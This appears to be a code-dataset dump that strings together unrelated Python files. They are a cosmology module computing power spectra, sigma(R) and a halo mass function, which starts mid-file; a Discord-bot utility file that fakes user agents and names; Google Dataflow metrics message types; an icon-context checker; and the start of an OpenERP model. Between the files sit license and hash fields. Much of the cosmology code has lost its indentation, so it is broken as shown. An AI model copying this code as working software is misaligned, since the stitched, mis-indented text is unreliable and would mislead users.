if pstype == "cbmatter":
Omegam = cosmo.Om0
Omegacb = cosmo.Ob0 + cosmo.Oc0
ratiosq = (Omegacb/Omegam)**2.0
#print "filename ", asciifile
pk = cio.cbpowerspectrum ( transferfile = asciifile ,
Omegacdm = cosmo.Oc0,
Omegab = cosmo.Ob0,
h = cosmo.h,
Omeganu = cosmo.On0,
As = params["As"],
#As = cosmo.As,
ns = cosmo.ns,
koverh = None )
return (pk [:,0], pk[:,1]*ratiosq)
if pstype == "matter" :
            if koverh is None:
koverh = tmpfile[:,0]
transfer = cio.loadtransfers( filename = asciifile)
transfertuple = (transfer[:,0], transfer[:,-1])
ps = cio.matterpowerfromtransfersforsinglespecies(
koverh ,
transfer = transfertuple,
h = cosmo.h ,
As = params["As"],
ns = cosmo.ns)
return (ps [:,0], ps[:,1])
    # fall-through: pstype did not match any handled case (the original
    # returned an undefined `pk` here)
    raise ValueError("Unknown pstype %s supplied" % pstype)
def sigma(ps , R = 8 , khmin = 1e-5, khmax = 2.0, logkhint = 0.005, cosmo = None, filt = filters.Wtophatkspacesq, **params) :
"""
returns the square root of the variance of isotropic, homogeneous
fluctuations filtered with a single scale filter at a scale of
R Mpc/h.
args:
ps: tuple of koverh , power spectrum values
R : array-like float, optional defaults to 8.0
radius in units of Mpc/h over which the filtering
is done
filt: function describing the shape of the filter
default is filters.Wtophatkspacesq which is
the Fourier transform of the tophat at R Mpc/h
cosmo: cosmological model
khmin: float, optional defaults to 1e-5
min value of k/h used in evaluating the integral.
usage:
>>> pk = np.loadtxt("powerspectrum")
>>> sigma (ps = (pk[:,0],pk[:,1]), cosmo = cosmo)
"""
sigsq= sigmasq(ps = ps , R =R, khmin = khmin , khmax = khmax ,
logkhint = logkhint , cosmo=cosmo , filt = filt , **params )
return np.sqrt(sigsq )
def sigmasq (ps , R = 8. , usenative = True, khmin = 0.9e-5 , khmax = 5.0, logkhint = 0.005 ,
cosmo = None, filt= filters.Wtophatkspacesq, **params) :
"""
Returns the variance of the overdensity field smoothed at
a radius of R Mpc/h using a filter specified by filt
args:
ps: tuple of koverh, power spectrum values
R : float array like
distance scale in units of Mpc/h over which
the filtering is done
usenative: bool, optional , defaults to True
Use values provided in ps, rather than
interpolation
cosmo: Model, whose hubble constant will be used
khmin: float, value below which the integral will not be
calculated
returns :
array of sigmasq values
notes:
- We need h, even if CAMB power spectrum is given
- If interpolation is used only, and the range provided
is outside the range of the data, only those points
in the original range will be used. extrapolation
is dangerous, particularly at high k, unless it is
made to drop as a power law.
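    usage:
        (illustrative; any tabulated matter power spectrum will do)
        >>> pk = np.loadtxt("powerspectrum")
        >>> sigsq = sigmasq(ps=(pk[:,0], pk[:,1]), R=8.0, cosmo=cosmo)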
"""
import numpy as np
import scipy.integrate as si
h = cosmo.H0/100.0
if usenative :
        # elementwise NaN checks need np.isnan; `is not np.nan` is always
        # True for an array, so the original mask never filtered anything
        mask = ~np.isnan(ps[1])
        #khvals = ps[0][mask]
        khvals = ps[0]
    else:
        logkhmin = np.log(khmin)
        logkhmax = np.log(khmax)
        # clamp to the range covered by the tabulated spectrum *before*
        # building the grid (the original clamped afterwards and compared
        # k/h values against log(k/h) values)
        logkhmin = max(np.log(min(ps[0])), logkhmin)
        logkhmax = min(np.log(max(ps[0])), logkhmax)
        logkh = np.arange(logkhmin, logkhmax, logkhint)
        khvals = np.exp(logkh)
        mask = khvals >= khmin
        khvals = khvals[mask]
k = khvals * h
psinterp = np.interp (khvals , ps[0], ps[1], left = np.nan, right = np.nan)
#plt.loglog(khvals, psinterp, label="interp")
#plt.loglog(ps[0], ps[1], label="native")
#plt.legend(loc= "best")
#plt.show()
if tu.isiterable(R):
R = np.asarray(R)
kr = np.outer( R, khvals )
else:
kr = R* khvals
kwinsq= filt (kr, R)
#kwin = 3*(np.sin(kr)-kr*np.cos(kr))/(kr)**3
#kwinsq = kwin *kwin
ksqWsqPk = k*k *kwinsq* psinterp /2. /np.pi/ np.pi/h /h/h
sigmasq = si.simps ( ksqWsqPk, x = k, even = 'avg')
return sigmasq
def getcosmo(cosmo, cambtf_file, sigma8 = None) :
"""
returns an FCPL object with the same cosmology as cosmo, except
that the amplitude is a CMB normalized As, such that the cambtf_file
produces the input sigma8, or the cosmo.sigma8
args:
returns:
cosmo with the amplitude set correctly so that
the sigma8 values match
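    usage:
        (illustrative sketch; the transfer-function filename is a stand-in)
        >>> normalized = getcosmo(cosmo, "LCDM_transfer_out.dat", sigma8=0.8)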
"""
Acosmo = cosmo
sig8 = sigma8
if sig8 is None:
sig8 = cosmo.sigma8
Acosmo.setamplitude(As =1.0, sigma8 = None)
cambtmp = powerspectrum(koverh = None, asciifile = cambtf_file,
cosmo = Acosmo )
As = getAsrel(cambtmp, sigma8 = sig8, cosmo = Acosmo)
Acosmo.setamplitude ( As = As, sigma8 = None)
return Acosmo
def getAsrel (ps , sigma8, khmin = 1.0e-5 , khmax = 2.0, logkhint = 0.005 ,
cosmo = None, filt= filters.Wtophatkspacesq, **params) :
"""
returns a relative value of As by which to multiply the power spectrum
values in order to obtain sigma8
args:
returns:
float, Asrel
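    notes:
        Since the power spectrum scales linearly with the amplitude,
        Asrel = sigma8**2 / sigmasq(ps, R=8 Mpc/h); multiplying the input
        spectrum by Asrel makes its filtered variance at 8 Mpc/h equal
        to sigma8**2.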
"""
sigsq = sigmasq (ps , khmin= khmin, khmax =khmax,logkhint =logkhint, cosmo = cosmo, filt = filt , **params)
#print "sigma8 ", sigma8
#print "sigsq ", sigsq
Asrel = sigma8*sigma8 / sigsq
#print "Asrel in Asre", Asrel
return Asrel
def sigmaM (M ,
ps ,
bgtype = "matter",
khmin = 1.0e-5 ,
khmax = 2.0 ,
logkhint = 0.005 ,
z = 0.0 ,
cosmo = None ,
**params):
"""Returns the standard deviation of the overdensity fields
smoothed at a radius corresponding to mass M.
args:
M: array like , mandatory
mass of halo in units of solar masses
        ps : tuple, mandatory
            (koverh, power spectrum values)
        bgtype : string, optional, defaults to "matter"
            background density used to convert mass M to a radius
        z : float, optional, defaults to 0.0
            redshift
        khmin : float, optional
            min value of k/h used in evaluating the integral
        cosmo : cosmological model, mandatory
            used for h and for converting mass to radius
notes:
the bgtype matters for converting Mass M to R.
Also ps must be set accordingly
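    usage:
        (illustrative; pk is a CAMB matter power spectrum table)
        >>> pk = np.loadtxt("LCDM_matterpower.dat")
        >>> sig = sigmaM(1e14, ps=(pk[:,0], pk[:,1]), cosmo=cosmo)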
"""
if tu.isiterable(M):
M = np.asarray(M)
#if cosmo == None:
# from astropy.cosmology import Planck13 as cosmo
h = cosmo.H0/100.0
R = filterradiusformass( M , bgtype= bgtype, z = z, cosmo = cosmo)
RinMpcoverh = R*h
#print "RinMpcoverh ***************"
#print RinMpcoverh
#return RinMpcoverh
return sigma( ps , R = RinMpcoverh, khmin = khmin , khmax = khmax, logkhint = logkhint , cosmo= cosmo, **params)
def dlnsigmadlnM (M ,
ps ,
bgtype = "matter",
cosmo = None ,
khmin = 1.0e-5 ,
khmax = 2.0 ,
logkhint = 0.005 ,
z = 0.0 ,
**params ) :
"""
    returns the derivative d ln(\sigma^{-1}) / d ln M at the given values of M.
args:
M: array-like, mandatory
mass of halo in units of solar mass
ps : tuple, mandatory
(koverh , ps)
        z : redshift. SHOULD ALWAYS BE SET TO 0; kept for historical
            reasons.
notes:
        d ln(\sigma^{-1})/d ln M = -(M/\sigma) * (d\sigma/dR) * (dR/dM)
        Computed as (1/\sigma) * (d\sigma/dR) * (dR/d ln M),
        where d\sigma/dR is sigma evaluated with the derivative of the filter.
"""
sig = sigmaM (M , ps , khmin = khmin ,
khmax = khmax ,
logkhint = logkhint ,
z = z ,
bgtype = bgtype ,
cosmo = cosmo ,
**params)
h = cosmo.h
R = filterradiusformass( M , bgtype = bgtype, z = 0, cosmo = cosmo)
dlnRdlnM = 1.0/3.0
RinMpcoverh = R*h
#d ln sigma /d ln R = d ln sigma^2 / d ln R / sigma^2/ 2.0
#sigmasq with filter of dWtophatkspacesqdlnR
# is dln sigma^2/ d ln R
dlnsigdlnR = sigmasq (R = RinMpcoverh , ps = ps, z = z ,
bgtype = bgtype, filt = filters.dWtophatkspacesqdlnR, cosmo = cosmo , khmin = khmin ,
khmax = khmax , logkhint = logkhint, **params )/sig/ sig/2.0
#return sig
return dlnsigdlnR *dlnRdlnM
def dndlnM ( M ,
ps ,
z = 0. ,
khmin = 1.0e-5,
khmax = 2.0 ,
logkhint = 0.005 ,
bgtype = "matter",
powerspectrumfile = "LCDM_matterpower.dat" ,
cosmo = None,
deltac = 1.674 ,
**params ):
"""
returns the mass function dn/dln(M) in units of h^3 Mpc^{-3}
args:
M: mandatory, arraylike
mass bin in units of solar Mass
powerspectrumfile : optional, string, defaults to
LCDM_matterpower.dat
name of the power spectrum file from CAMB
cosmo: optional defaults to Planck13
cosmology model
returns:
numpy array containing mass function in units of Mpc^{-3}
CHANGES:
added argument deltac with default value 1.674
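    usage:
        (illustrative; pk is a CAMB matter power spectrum table)
        >>> M = 10.**np.arange(11., 16., 0.1)
        >>> pk = np.loadtxt("LCDM_matterpower.dat")
        >>> mf = dndlnM(M, ps=(pk[:,0], pk[:,1]), cosmo=cosmo)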
"""
h = cosmo.H0/100.0
#rhocr = critdensity( h = h ,
# unittype = "solarmassperMpc3")
sig = sigmaM (M ,
ps ,
bgtype = bgtype,
khmin = khmin ,
khmax = khmax ,
logkhint = logkhint ,
z = z,
cosmo = cosmo ,
**params)
dlsinvdlM = -dlnsigmadlnM (M ,
ps ,
z = z ,
bgtype = bgtype ,
cosmo = cosmo ,
khmin = khmin ,
khmax = khmax ,
logkhint = logkhint ,
**params )
f_sigma = mf.__fsigmaBhattacharya (
sigma = sig,
deltac = deltac ,
z = z ,
A0 = 0.333 ,
a0 = 0.788 ,
p0 = 0.807 ,
q0 = 1.795 ,
alpha1 = 0.11 ,
alpha2 = 0.01 ,
alpha3 = 0.0 ,
alpha4 = 0.0,
Mlow = 6e11 ,
Mhigh = 3e15)
rhobg = __rhobg( z =z , bgtype = bgtype,
unittype = "solarmassperMpc3", cosmo = cosmo)
dndlnM = rhobg *f_sigma *dlsinvdlM /M
#dndlnM = dlsinvdlM *f_sigma/M * rhobg
#critdensity(h = cosmo.h, unittype = "solarmassperMpc3")*cosmo.Om0
return dndlnM
if __name__=="__main__":
import numpy as np
import matplotlib.pyplot as plt
import camb_utils.cambio as cio
import sys
#pk = cio.loadpowerspectrum ("example_data/LCDM_def_matterpower.dat")
pk = cio.loadpowerspectrum ("LCDM_matterpower.dat")
ts = cio.loadtransfers(filename = "example_data/LCDM_def_transfer_out.dat")
#print np.shape(ts)
#print pk[:,0]
pkt = cio.matterpowerfromtransfersforsinglespecies(koverh = pk[:,0],
transfer = (ts[:,0],ts[:,-1]), h = 0.71, As = 2.1e-9, ns = 0.963)
plt.loglog ( pk[:,0], pk[:,1])
plt.loglog ( pkt[:,0], pkt[:,1])
plt.figure()
from astropy.cosmology import Planck13 as cosmo
#print sigma(ps = (pk[:,0],pk[:,1]) , R = 8.0, cosmo = cosmo)
#plt.show()
    sys.exit()
    # NOTE: the demo code below predates the current call signatures
    # (sigma, sigmaM, dndlnM now require a ps tuple and a cosmo) and is
    # skipped by the sys.exit() above; it is kept for reference only.
M = 10.**(np.arange(7,16,0.2))
R = np.arange(0.0005, 50.0,0.1)
#R = np.array([4,8,12])
#print sigma (8.0)
plt.figure()
plt.plot(R, sigma(R))
plt.xlabel("R ( Mpc /h )")
plt.ylabel(r'$\sigma (R)$')
plt.figure()
plt.plot(M ,filterradiusformass(M))
plt.xscale('log')
plt.xlabel("M ")
plt.ylabel(r'$R(M) Mpc $')
plt.figure()
plt.plot ( M, sigmaM(M, powerspectrumfile = "LCDM_def_matterpower.dat"), "o")
plt.plot ( M, 1./sigmaM(M,powerspectrumfile = "LCDM_def_matterpower.dat"),'o')
plt.xlabel("M ")
plt.ylabel(r'$\sigma (M)$')
plt.xscale('log')
plt.figure()
plt.plot ( M[1:-1], dlninvsigmaMdlnM (M ),"o")
plt.xlabel(r'$M (M_\odot$')
plt.ylabel(r'$\frac{d ln \sigma^{-1}}{d ln(M)}$')
plt.xscale('log')
plt.tight_layout()
    plt.savefig("dlninvsigmadlnM.pdf")
plt.figure()
#plt.plot (1./ sigmaM(M[1:-1]), dndlnM (M ), "o")
plt.plot (M[1:-1], dndlnM (M ), "o")
plt.xscale('log')
plt.yscale('log')
plt.show()
#print filterradiusformass ( M =
#plt.show()
|
mit
| -3,501,540,544,829,631,000
| 24.672362
| 127
| 0.65393
| false
| 2.754664
| false
| false
| false
|
necroguemancer/google-play-discord-bot
|
utils.py
|
1
|
1935
|
from time import sleep, strftime
from datetime import datetime
# from requests.packages.urllib3.exceptions import InsecureRequestWarning
import requests, random
try:
from faker import Faker
fake = Faker()
except Exception:
print("Run \"pip install Faker\" using the correct pip path and you should be fine.")
# import sys; sys.exit(1)
def string_to_dict(headers):
headers_dict = {}
for line in headers.split("\n"):
if not line: continue
line = line.strip()
key, *values = line.split(" ")
key = key[:-1]
if not (key and values): continue
headers_dict[key] = " ".join(values)
return headers_dict
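# Illustrative sketch of string_to_dict on a pasted header block; the
# header values below are made-up examples, not from any real capture:
#
#     headers = """Host: example.com
#     User-Agent: Mozilla/5.0"""
#     string_to_dict(headers)
#     # -> {'Host': 'example.com', 'User-Agent': 'Mozilla/5.0'}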
def get_time():
return "[" + strftime("%m/%d %H:%M:%S") + "]"
def dump(r):
with open("dump.html", "w") as f:
f.write(str(r))
def clean(text):
return ''.join([i if ord(i) < 128 else ' ' for i in text])
class ThreadManager(object):
"""docstring for ThreadManager"""
def __init__(self, MAX_THREADS = 30, MESSAGES = False, TIME = True):
super(ThreadManager, self).__init__()
self.MAX_THREADS = MAX_THREADS
self.MESSAGES = MESSAGES
self.TIME = TIME
self.threads = []
def load(self, thread):
self.threads.append(thread)
def clear(self):
self.threads = []
def start(self):
start_time = datetime.now()
THREAD_COUNT = 0
for t in self.threads:
t.daemon = True
t.start()
THREAD_COUNT += 1
if THREAD_COUNT >= self.MAX_THREADS:
if self.MESSAGES:
print("Waiting for a thread to end.")
t.join()
if self.MESSAGES:
print("Starting a new thread now.")
THREAD_COUNT -= 1
if self.MESSAGES:
print("Waiting for all threads to end.")
for t in self.threads:
t.join()
if self.TIME:
print(datetime.now() - start_time)
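# Illustrative ThreadManager usage; `fetch` and `urls` are hypothetical
# stand-ins, not part of this module:
#
#     from threading import Thread
#     tm = ThreadManager(MAX_THREADS=10)
#     for url in urls:
#         tm.load(Thread(target=fetch, args=(url,)))
#     tm.start()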
def get_user_agent():
return fake.user_agent()
def get_random_name():
return "{}{}{}".format(fake.first_name(), fake.last_name(), random.randint(1, 100))
# requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
|
gpl-3.0
| 4,605,339,655,682,512,000
| 23.493671
| 86
| 0.663049
| false
| 3.042453
| false
| false
| false
|
googleapis/python-dataflow-client
|
google/cloud/dataflow_v1beta3/types/metrics.py
|
1
|
16973
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.protobuf import struct_pb2 # type: ignore
from google.protobuf import timestamp_pb2 # type: ignore
__protobuf__ = proto.module(
package="google.dataflow.v1beta3",
manifest={
"ExecutionState",
"MetricStructuredName",
"MetricUpdate",
"GetJobMetricsRequest",
"JobMetrics",
"GetJobExecutionDetailsRequest",
"ProgressTimeseries",
"StageSummary",
"JobExecutionDetails",
"GetStageExecutionDetailsRequest",
"WorkItemDetails",
"WorkerDetails",
"StageExecutionDetails",
},
)
class ExecutionState(proto.Enum):
r"""The state of some component of job execution."""
EXECUTION_STATE_UNKNOWN = 0
EXECUTION_STATE_NOT_STARTED = 1
EXECUTION_STATE_RUNNING = 2
EXECUTION_STATE_SUCCEEDED = 3
EXECUTION_STATE_FAILED = 4
EXECUTION_STATE_CANCELLED = 5
class MetricStructuredName(proto.Message):
r"""Identifies a metric, by describing the source which generated
the metric.
Attributes:
origin (str):
Origin (namespace) of metric name. May be
            blank for user-defined metrics; will be
"dataflow" for metrics defined by the Dataflow
service or SDK.
name (str):
Worker-defined metric name.
context (Sequence[google.cloud.dataflow_v1beta3.types.MetricStructuredName.ContextEntry]):
Zero or more labeled fields which identify the part of the
job this metric is associated with, such as the name of a
step or collection.
            For example, built-in counters associated with steps will
            have context['step'] = <step-name>. Counters associated with
            PCollections in the SDK will have
            context['pcollection'] = <pcollection-name>.
"""
origin = proto.Field(proto.STRING, number=1,)
name = proto.Field(proto.STRING, number=2,)
context = proto.MapField(proto.STRING, proto.STRING, number=3,)
class MetricUpdate(proto.Message):
r"""Describes the state of a metric.
Attributes:
name (google.cloud.dataflow_v1beta3.types.MetricStructuredName):
Name of the metric.
kind (str):
Metric aggregation kind. The possible metric
aggregation kinds are "Sum", "Max", "Min",
"Mean", "Set", "And", "Or", and "Distribution".
            The specified aggregation kind is
            case-insensitive.
If omitted, this is not an aggregated value but
instead a single metric sample value.
cumulative (bool):
True if this metric is reported as the total
cumulative aggregate value accumulated since the
worker started working on this WorkItem. By
default this is false, indicating that this
metric is reported as a delta that is not
associated with any WorkItem.
scalar (google.protobuf.struct_pb2.Value):
Worker-computed aggregate value for
aggregation kinds "Sum", "Max", "Min", "And",
and "Or". The possible value types are Long,
Double, and Boolean.
mean_sum (google.protobuf.struct_pb2.Value):
Worker-computed aggregate value for the "Mean" aggregation
kind. This holds the sum of the aggregated values and is
used in combination with mean_count below to obtain the
actual mean aggregate value. The only possible value types
are Long and Double.
mean_count (google.protobuf.struct_pb2.Value):
Worker-computed aggregate value for the "Mean" aggregation
kind. This holds the count of the aggregated values and is
used in combination with mean_sum above to obtain the actual
mean aggregate value. The only possible value type is Long.
set_ (google.protobuf.struct_pb2.Value):
Worker-computed aggregate value for the "Set"
aggregation kind. The only possible value type
is a list of Values whose type can be Long,
Double, or String, according to the metric's
type. All Values in the list must be of the
same type.
distribution (google.protobuf.struct_pb2.Value):
A struct value describing properties of a
distribution of numeric values.
gauge (google.protobuf.struct_pb2.Value):
A struct value describing properties of a
Gauge. Metrics of gauge type show the value of a
metric across time, and is aggregated based on
the newest value.
internal (google.protobuf.struct_pb2.Value):
Worker-computed aggregate value for internal
use by the Dataflow service.
update_time (google.protobuf.timestamp_pb2.Timestamp):
Timestamp associated with the metric value.
Optional when workers are reporting work
progress; it will be filled in responses from
the metrics API.
"""
name = proto.Field(proto.MESSAGE, number=1, message="MetricStructuredName",)
kind = proto.Field(proto.STRING, number=2,)
cumulative = proto.Field(proto.BOOL, number=3,)
scalar = proto.Field(proto.MESSAGE, number=4, message=struct_pb2.Value,)
mean_sum = proto.Field(proto.MESSAGE, number=5, message=struct_pb2.Value,)
mean_count = proto.Field(proto.MESSAGE, number=6, message=struct_pb2.Value,)
set_ = proto.Field(proto.MESSAGE, number=7, message=struct_pb2.Value,)
distribution = proto.Field(proto.MESSAGE, number=11, message=struct_pb2.Value,)
gauge = proto.Field(proto.MESSAGE, number=12, message=struct_pb2.Value,)
internal = proto.Field(proto.MESSAGE, number=8, message=struct_pb2.Value,)
update_time = proto.Field(proto.MESSAGE, number=9, message=timestamp_pb2.Timestamp,)
class GetJobMetricsRequest(proto.Message):
r"""Request to get job metrics.
Attributes:
project_id (str):
A project id.
job_id (str):
The job to get metrics for.
start_time (google.protobuf.timestamp_pb2.Timestamp):
Return only metric data that has changed
since this time. Default is to return all
information about all metrics for the job.
location (str):
The [regional endpoint]
(https://cloud.google.com/dataflow/docs/concepts/regional-endpoints)
that contains the job specified by job_id.
"""
project_id = proto.Field(proto.STRING, number=1,)
job_id = proto.Field(proto.STRING, number=2,)
start_time = proto.Field(proto.MESSAGE, number=3, message=timestamp_pb2.Timestamp,)
location = proto.Field(proto.STRING, number=4,)
class JobMetrics(proto.Message):
r"""JobMetrics contains a collection of metrics describing the
detailed progress of a Dataflow job. Metrics correspond to user-
defined and system-defined metrics in the job.
This resource captures only the most recent values of each
metric; time-series data can be queried for them (under the same
metric names) from Cloud Monitoring.
Attributes:
metric_time (google.protobuf.timestamp_pb2.Timestamp):
Timestamp as of which metric values are
current.
metrics (Sequence[google.cloud.dataflow_v1beta3.types.MetricUpdate]):
All metrics for this job.
"""
metric_time = proto.Field(proto.MESSAGE, number=1, message=timestamp_pb2.Timestamp,)
metrics = proto.RepeatedField(proto.MESSAGE, number=2, message="MetricUpdate",)
class GetJobExecutionDetailsRequest(proto.Message):
r"""Request to get job execution details.
Attributes:
project_id (str):
A project id.
job_id (str):
The job to get execution details for.
location (str):
The [regional endpoint]
(https://cloud.google.com/dataflow/docs/concepts/regional-endpoints)
that contains the job specified by job_id.
page_size (int):
If specified, determines the maximum number
of stages to return. If unspecified, the
service may choose an appropriate default, or
may return an arbitrarily large number of
results.
page_token (str):
If supplied, this should be the value of next_page_token
returned by an earlier call. This will cause the next page
of results to be returned.
"""
project_id = proto.Field(proto.STRING, number=1,)
job_id = proto.Field(proto.STRING, number=2,)
location = proto.Field(proto.STRING, number=3,)
page_size = proto.Field(proto.INT32, number=4,)
page_token = proto.Field(proto.STRING, number=5,)
class ProgressTimeseries(proto.Message):
r"""Information about the progress of some component of job
execution.
Attributes:
current_progress (float):
The current progress of the component, in the range [0,1].
data_points (Sequence[google.cloud.dataflow_v1beta3.types.ProgressTimeseries.Point]):
History of progress for the component.
Points are sorted by time.
"""
class Point(proto.Message):
r"""A point in the timeseries.
Attributes:
time (google.protobuf.timestamp_pb2.Timestamp):
The timestamp of the point.
value (float):
The value of the point.
"""
time = proto.Field(proto.MESSAGE, number=1, message=timestamp_pb2.Timestamp,)
value = proto.Field(proto.DOUBLE, number=2,)
current_progress = proto.Field(proto.DOUBLE, number=1,)
data_points = proto.RepeatedField(proto.MESSAGE, number=2, message=Point,)
class StageSummary(proto.Message):
r"""Information about a particular execution stage of a job.
Attributes:
stage_id (str):
ID of this stage
state (google.cloud.dataflow_v1beta3.types.ExecutionState):
State of this stage.
start_time (google.protobuf.timestamp_pb2.Timestamp):
Start time of this stage.
end_time (google.protobuf.timestamp_pb2.Timestamp):
End time of this stage.
If the work item is completed, this is the
actual end time of the stage. Otherwise, it is
the predicted end time.
progress (google.cloud.dataflow_v1beta3.types.ProgressTimeseries):
Progress for this stage.
Only applicable to Batch jobs.
metrics (Sequence[google.cloud.dataflow_v1beta3.types.MetricUpdate]):
Metrics for this stage.
"""
stage_id = proto.Field(proto.STRING, number=1,)
state = proto.Field(proto.ENUM, number=2, enum="ExecutionState",)
start_time = proto.Field(proto.MESSAGE, number=3, message=timestamp_pb2.Timestamp,)
end_time = proto.Field(proto.MESSAGE, number=4, message=timestamp_pb2.Timestamp,)
progress = proto.Field(proto.MESSAGE, number=5, message="ProgressTimeseries",)
metrics = proto.RepeatedField(proto.MESSAGE, number=6, message="MetricUpdate",)
class JobExecutionDetails(proto.Message):
r"""Information about the execution of a job.
Attributes:
stages (Sequence[google.cloud.dataflow_v1beta3.types.StageSummary]):
The stages of the job execution.
next_page_token (str):
If present, this response does not contain all requested
tasks. To obtain the next page of results, repeat the
request with page_token set to this value.
"""
@property
def raw_page(self):
return self
stages = proto.RepeatedField(proto.MESSAGE, number=1, message="StageSummary",)
next_page_token = proto.Field(proto.STRING, number=2,)
class GetStageExecutionDetailsRequest(proto.Message):
r"""Request to get information about a particular execution stage
of a job. Currently only tracked for Batch jobs.
Attributes:
project_id (str):
A project id.
job_id (str):
The job to get execution details for.
location (str):
The [regional endpoint]
(https://cloud.google.com/dataflow/docs/concepts/regional-endpoints)
that contains the job specified by job_id.
stage_id (str):
The stage for which to fetch information.
page_size (int):
If specified, determines the maximum number
of work items to return. If unspecified, the
service may choose an appropriate default, or
may return an arbitrarily large number of
results.
page_token (str):
If supplied, this should be the value of next_page_token
returned by an earlier call. This will cause the next page
of results to be returned.
start_time (google.protobuf.timestamp_pb2.Timestamp):
Lower time bound of work items to include, by
start time.
end_time (google.protobuf.timestamp_pb2.Timestamp):
Upper time bound of work items to include, by
start time.
"""
project_id = proto.Field(proto.STRING, number=1,)
job_id = proto.Field(proto.STRING, number=2,)
location = proto.Field(proto.STRING, number=3,)
stage_id = proto.Field(proto.STRING, number=4,)
page_size = proto.Field(proto.INT32, number=5,)
page_token = proto.Field(proto.STRING, number=6,)
start_time = proto.Field(proto.MESSAGE, number=7, message=timestamp_pb2.Timestamp,)
end_time = proto.Field(proto.MESSAGE, number=8, message=timestamp_pb2.Timestamp,)
class WorkItemDetails(proto.Message):
r"""Information about an individual work item execution.
Attributes:
task_id (str):
Name of this work item.
attempt_id (str):
Attempt ID of this work item
start_time (google.protobuf.timestamp_pb2.Timestamp):
Start time of this work item attempt.
end_time (google.protobuf.timestamp_pb2.Timestamp):
End time of this work item attempt.
If the work item is completed, this is the
actual end time of the work item. Otherwise, it
is the predicted end time.
state (google.cloud.dataflow_v1beta3.types.ExecutionState):
State of this work item.
progress (google.cloud.dataflow_v1beta3.types.ProgressTimeseries):
Progress of this work item.
metrics (Sequence[google.cloud.dataflow_v1beta3.types.MetricUpdate]):
Metrics for this work item.
"""
task_id = proto.Field(proto.STRING, number=1,)
attempt_id = proto.Field(proto.STRING, number=2,)
start_time = proto.Field(proto.MESSAGE, number=3, message=timestamp_pb2.Timestamp,)
end_time = proto.Field(proto.MESSAGE, number=4, message=timestamp_pb2.Timestamp,)
state = proto.Field(proto.ENUM, number=5, enum="ExecutionState",)
progress = proto.Field(proto.MESSAGE, number=6, message="ProgressTimeseries",)
metrics = proto.RepeatedField(proto.MESSAGE, number=7, message="MetricUpdate",)
class WorkerDetails(proto.Message):
r"""Information about a worker
Attributes:
worker_name (str):
Name of this worker
work_items (Sequence[google.cloud.dataflow_v1beta3.types.WorkItemDetails]):
Work items processed by this worker, sorted
by time.
"""
worker_name = proto.Field(proto.STRING, number=1,)
work_items = proto.RepeatedField(
proto.MESSAGE, number=2, message="WorkItemDetails",
)
class StageExecutionDetails(proto.Message):
r"""Information about the workers and work items within a stage.
Attributes:
workers (Sequence[google.cloud.dataflow_v1beta3.types.WorkerDetails]):
Workers that have done work on the stage.
next_page_token (str):
If present, this response does not contain all requested
tasks. To obtain the next page of results, repeat the
request with page_token set to this value.
"""
@property
def raw_page(self):
return self
workers = proto.RepeatedField(proto.MESSAGE, number=1, message="WorkerDetails",)
next_page_token = proto.Field(proto.STRING, number=2,)
__all__ = tuple(sorted(__protobuf__.manifest))
|
apache-2.0
| -5,073,147,159,870,581,000
| 40.196602
| 98
| 0.654274
| false
| 4.253885
| false
| false
| false
|
debug-icons-project/debug-icons-tools
|
code/check_icon_names.py
|
1
|
2994
|
import os
ICON_DATABASE_FOLDER = "../icon-database"
def check_for_context_problems(themes):
print "Checking the following themes for icons in multiple contexts:"
print ", ".join(themes)
print
Icons = {}
for theme in themes:
with open(os.path.join(ICON_DATABASE_FOLDER, theme + ".txt"), "r") as f:
icons = f.read().splitlines()
for icon in icons:
context, name = icon.split("/")
if not Icons.has_key(name):
Icons[name] = {}
if not Icons[name].has_key(context):
Icons[name][context] = []
Icons[name][context].append(theme)
names = Icons.keys()
names.sort()
for name in names:
data = Icons[name]
number_of_contexts_for_current_icon = len(data.keys())
if number_of_contexts_for_current_icon == 1:
# everything is fine, the icon has the same context in all themes
# themes = data[data.keys()[0]]
# number_of_themes = len(themes)
# if number_of_themes != 1:
# print name, themes
# print name, data
# print
# print
pass
else:
print name
for category in data.keys():
# print category, data[category]
for theme in data[category]:
print " %-13s:" %category, theme
print
# print
correct_icons = 0
incorrect_icons = 0
for name, data in Icons.iteritems():
number_of_contexts_for_current_icon = len(data.keys())
if number_of_contexts_for_current_icon == 1:
correct_icons += 1
else:
incorrect_icons += 1
print "Icons with unique contexts: ", correct_icons
print "Icons with multiple contexts:", incorrect_icons
if __name__ == "__main__":
import sys
nparams = len(sys.argv) - 1
# Please note:
# - all themes must be in the "../base_themes/" subfolder!
    # - the theme name is the folder of the theme, not the one given in the index.theme file
# - one could implement direct support of locally installed theme files in /usr/share/icons
# but creating symlinks in the ".../base_themes/" folder might be easier
# if there are parameters passed via command line then these are treated as theme names...
if nparams >= 1:
themes = sys.argv[1:]
# ... otherwise use all the available theme folders
else:
        # get all files in the icon database folder
themes = os.listdir(ICON_DATABASE_FOLDER)
        # keep only regular files (the theme icon lists) in the database folder
        themes = [f for f in themes if os.path.isfile(os.path.join(ICON_DATABASE_FOLDER, f))]
        # keep only files with the '.txt' ending and strip the extension
themes = [f[:-4] for f in themes if f.endswith(".txt")]
check_for_context_problems(themes)
|
mit
| 1,633,209,410,626,736,400
| 25.732143
| 95
| 0.565464
| false
| 4.135359
| false
| false
| false
|
Johnzero/erp
|
openerp/addons/fg_account/report/period_check.py
|
1
|
6379
|
# -*- coding: utf-8 -*-
import tools
from osv import fields, osv
class reconcile_item(osv.osv_memory):
_name = "fg_account.reconcile.item"
_columns = {
'ref_doc':fields.reference('单据', selection=[('fg_sale.order','销售订单'),('fg_account.bill','收款单')],
size=128, readonly=True),
'o_date': fields.date('单据日期', readonly=True),
'name':fields.char('单号', size=24),
'o_partner': fields.many2one('res.partner', '客户', readonly=True),
't':fields.char('项目', size=12, readonly=True),
'reconciled':fields.boolean('已对账', readonly=True),
'cleared':fields.boolean('已清账', readonly=True),
'amount': fields.float('金额', digits=(16,4), readonly=True),
'balance':fields.float('余额', digits=(16,4), readonly=True),
'note':fields.text('附注'),
}
